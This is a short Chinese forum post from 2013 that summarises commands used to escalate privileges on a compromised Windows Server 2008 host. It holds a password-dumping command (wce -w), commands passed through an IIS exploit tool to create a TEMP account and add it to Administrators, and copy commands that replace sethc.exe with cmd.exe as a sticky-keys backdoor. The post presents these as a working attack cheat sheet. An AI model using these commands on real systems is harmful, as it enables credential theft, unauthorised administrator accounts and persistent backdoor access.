上次提权一 windows 2008的主机,现将用到的几个命令总结如下。
1.使用wce抓取密码 直接抓密码命令wce -w
2.webshell提权要看是什么权限,如果是system权限则可以直接添加用户。否则只能通过漏洞提权了。
3.iis7.exe 工具使用命令
IIS "NET USER TEMP TEMP /ADD "
IIS "NET LOCALGROUP ADMINISTRATORS TEMP /ADD"
4.set命令
可检查系统设置情况
5.systeminfo
查看系统详细信息 这个比set和whoami都要好使
6. whoami是操作系统中用于查看当前用户权限(英语:User (computing))的命令
调用该命令时系统会输出当前用户的有效用户名
7.另外还用到了粘滞键替换的几条命令:
copy c:\windows\system32\sethc.exe c:\windows\system32\sethcbk.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
以上是本人的一点小总结。高手勿喷。
|
发表于 2013-7-13 19:19:21
收藏
支持
反对